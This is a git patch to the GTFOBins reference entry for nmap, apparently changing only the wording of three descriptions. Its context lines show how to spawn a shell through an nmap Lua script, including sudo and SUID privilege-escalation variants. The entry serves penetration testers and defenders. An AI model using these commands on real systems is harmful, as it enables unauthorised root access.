From 97c54f9b22c5109a4a662465583380b7fdb02a47 Mon Sep 17 00:00:00 2001 From: Andrea Cardaci Date: Thu, 23 Aug 2018 17:57:26 +0200 Subject: [PATCH] Fix nmap descriptions --- _gtfobins/nmap.md | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/_gtfobins/nmap.md b/_gtfobins/nmap.md index 1679503..12b3a17 100644 --- a/_gtfobins/nmap.md +++ b/_gtfobins/nmap.md @@ -1,19 +1,19 @@ --- functions: execute-interactive: - - description: Echoing of input characters is disabled. + - description: Input echo is disabled. code: | TF=$(mktemp) echo 'os.execute("/bin/sh")' > $TF nmap --script=$TF sudo-enabled: - - description: Echoing of input characters is disabled. + - description: Input echo is disabled. code: | TF=$(mktemp) echo 'os.execute("/bin/sh")' > $TF sudo nmap --script=$TF suid-enabled: - - description: Echoing of input characters is disabled. + - description: Input echo is disabled. code: | TF=$(mktemp) echo 'os.execute("/bin/sh -p")' > $TF